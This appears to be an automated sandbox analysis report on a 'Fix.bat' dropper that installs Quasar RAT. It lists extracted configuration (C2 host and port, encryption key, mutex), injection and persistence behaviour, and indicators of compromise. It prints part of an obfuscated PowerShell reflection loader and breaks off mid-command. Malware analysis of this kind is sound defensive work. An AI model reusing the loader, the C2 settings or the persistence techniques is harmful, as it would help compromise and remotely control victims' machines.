quasar | aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

Analysis

max time kernel
300s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2024 19:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fix.bat
Size

621B
MD5

e235e723f57a72ef725306c3e14d4726
SHA1

9b2153053f8e89c300e32da5df32e9b990594aac
SHA256

aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67
SHA512

0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Score

10^/10

quasar rpad discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes

encryption_key
XmcBnPuLlN1e8SHIRR1z
install_name
$sxr-powershell.exe
log_directory
$SXR-LOGS
reconnect_delay
3000
startup_key
$sxr-powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe	family_quasar
behavioral1/memory/4840-53-0x0000000000D30000-0x0000000000D9C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

description	pid	process	target process
PID 4932 created 608	4932	powershell.EXE	winlogon.exe
PID 3556 created 608	3556	powershell.EXE	winlogon.exe
PID 1808 created 608	1808	powershell.EXE	winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4488 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

BoostBot.exe$sxr-powershell.exeinstall.exeinstall.exeinstall.exe

pid process

4840 BoostBot.exe
4168 $sxr-powershell.exe
4992 install.exe
4220 install.exe
4932 install.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5096 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

21 raw.githubusercontent.com
15 raw.githubusercontent.com
16 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com

pid	process
4840	BoostBot.exe
4168	$sxr-powershell.exe
4992	install.exe
4220	install.exe
4932	install.exe

pid	process
5096	icacls.exe

flow	ioc
21	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

flow	ioc
10	ip-api.com

Drops file in System32 directory 20 IoCs

Processes:

svchost.exepowershell.EXEsvchost.exepowershell.EXEsvchost.exepowershell.EXEOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\$77$sxr-powershell.exe	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

description	pid	process	target process
PID 4932 set thread context of 5000	4932	powershell.EXE	dllhost.exe
PID 3556 set thread context of 1476	3556	powershell.EXE	dllhost.exe
PID 1808 set thread context of 2184	1808	powershell.EXE	dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exe

pid process

4560 schtasks.exe
2220 SCHTASKS.exe
1280 schtasks.exe
3064 SCHTASKS.exe

pid	process
4560	schtasks.exe
2220	SCHTASKS.exe
1280	schtasks.exe
3064	SCHTASKS.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 12 May 2024 19:03:09 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1776 PING.EXE

pid	process
1776	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEdllhost.exe$sxr-powershell.exedllhost.exe

pid	process
4488	powershell.exe
4488	powershell.exe
4488	powershell.exe
4932	powershell.EXE
4932	powershell.EXE
4932	powershell.EXE
3556	powershell.EXE
3556	powershell.EXE
4932	powershell.EXE
3556	powershell.EXE
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
4168	$sxr-powershell.exe
3556	powershell.EXE
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
5000	dllhost.exe
4168	$sxr-powershell.exe
3556	powershell.EXE
5000	dllhost.exe
5000	dllhost.exe
3556	powershell.EXE
5000	dllhost.exe
5000	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe
1476	dllhost.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exeBoostBot.exepowershell.EXE$sxr-powershell.exepowershell.EXEdllhost.exesvchost.exedllhost.exeExplorer.EXEpowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	4840	BoostBot.exe
Token: SeDebugPrivilege	4932	powershell.EXE
Token: SeDebugPrivilege	4168	$sxr-powershell.exe
Token: SeDebugPrivilege	3556	powershell.EXE
Token: SeDebugPrivilege	4932	powershell.EXE
Token: SeDebugPrivilege	5000	dllhost.exe
Token: SeAuditPrivilege	2552	svchost.exe
Token: SeDebugPrivilege	3556	powershell.EXE
Token: SeDebugPrivilege	1476	dllhost.exe
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeDebugPrivilege	1808	powershell.EXE
Token: SeDebugPrivilege	1808	powershell.EXE
Token: SeDebugPrivilege	2184	dllhost.exe
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-powershell.exe

pid process

4168 $sxr-powershell.exe

pid	process
4168	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2176 wrote to memory of 1676	2176	cmd.exe	certutil.exe
PID 2176 wrote to memory of 1676	2176	cmd.exe	certutil.exe
PID 2176 wrote to memory of 4488	2176	cmd.exe	powershell.exe
PID 2176 wrote to memory of 4488	2176	cmd.exe	powershell.exe
PID 4488 wrote to memory of 4840	4488	powershell.exe	BoostBot.exe
PID 4488 wrote to memory of 4840	4488	powershell.exe	BoostBot.exe
PID 4488 wrote to memory of 4840	4488	powershell.exe	BoostBot.exe
PID 2176 wrote to memory of 5096	2176	cmd.exe	icacls.exe
PID 2176 wrote to memory of 5096	2176	cmd.exe	icacls.exe
PID 2176 wrote to memory of 5048	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 5048	2176	cmd.exe	reg.exe
PID 2176 wrote to memory of 2300	2176	cmd.exe	attrib.exe
PID 2176 wrote to memory of 2300	2176	cmd.exe	attrib.exe
PID 4840 wrote to memory of 4560	4840	BoostBot.exe	schtasks.exe
PID 4840 wrote to memory of 4560	4840	BoostBot.exe	schtasks.exe
PID 4840 wrote to memory of 4560	4840	BoostBot.exe	schtasks.exe
PID 4840 wrote to memory of 4168	4840	BoostBot.exe	$sxr-powershell.exe
PID 4840 wrote to memory of 4168	4840	BoostBot.exe	$sxr-powershell.exe
PID 4840 wrote to memory of 4168	4840	BoostBot.exe	$sxr-powershell.exe
PID 4840 wrote to memory of 4992	4840	BoostBot.exe	install.exe
PID 4840 wrote to memory of 4992	4840	BoostBot.exe	install.exe
PID 4840 wrote to memory of 4992	4840	BoostBot.exe	install.exe
PID 4840 wrote to memory of 2220	4840	BoostBot.exe	SCHTASKS.exe
PID 4840 wrote to memory of 2220	4840	BoostBot.exe	SCHTASKS.exe
PID 4840 wrote to memory of 2220	4840	BoostBot.exe	SCHTASKS.exe
PID 4168 wrote to memory of 1280	4168	$sxr-powershell.exe	schtasks.exe
PID 4168 wrote to memory of 1280	4168	$sxr-powershell.exe	schtasks.exe
PID 4168 wrote to memory of 1280	4168	$sxr-powershell.exe	schtasks.exe
PID 4168 wrote to memory of 4220	4168	$sxr-powershell.exe	install.exe
PID 4168 wrote to memory of 4220	4168	$sxr-powershell.exe	install.exe
PID 4168 wrote to memory of 4220	4168	$sxr-powershell.exe	install.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 4932 wrote to memory of 5000	4932	powershell.EXE	dllhost.exe
PID 5000 wrote to memory of 608	5000	dllhost.exe	winlogon.exe
PID 5000 wrote to memory of 660	5000	dllhost.exe	lsass.exe
PID 5000 wrote to memory of 744	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 928	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1012	5000	dllhost.exe	dwm.exe
PID 5000 wrote to memory of 428	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 424	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 788	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 920	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1112	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1144	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1200	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1268	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1308	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1316	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1416	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1432	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1456	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1524	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1580	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1616	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1652	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1780	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1800	5000	dllhost.exe	svchost.exe
PID 5000 wrote to memory of 1820	5000	dllhost.exe	svchost.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2300 attrib.exe

pid	process
2300	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:608

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1012

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d1a7ff74-241b-46ac-a0e7-938a7460db38}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3219aa11-6abe-4744-8c54-11303c04ec08}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f9ff7be7-cc0f-4a06-aa76-837d8f5843be}
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:788

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1112

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UXiVYKZntfWC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OCjfGLBOFXUgdk,[Parameter(Position=1)][Type]$rBfCzeeLWF)$aOlLPnyVZxL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+'lega'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+[Char](109)+'ory'+[Char](77)+''+[Char](111)+'du'+'l'+''+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$aOlLPnyVZxL.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OCjfGLBOFXUgdk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$aOlLPnyVZxL.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+'e'+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l',$rBfCzeeLWF,$OCjfGLBOFXUgdk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $aOlLPnyVZxL.CreateType();}$CIYScuxnOXTwn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 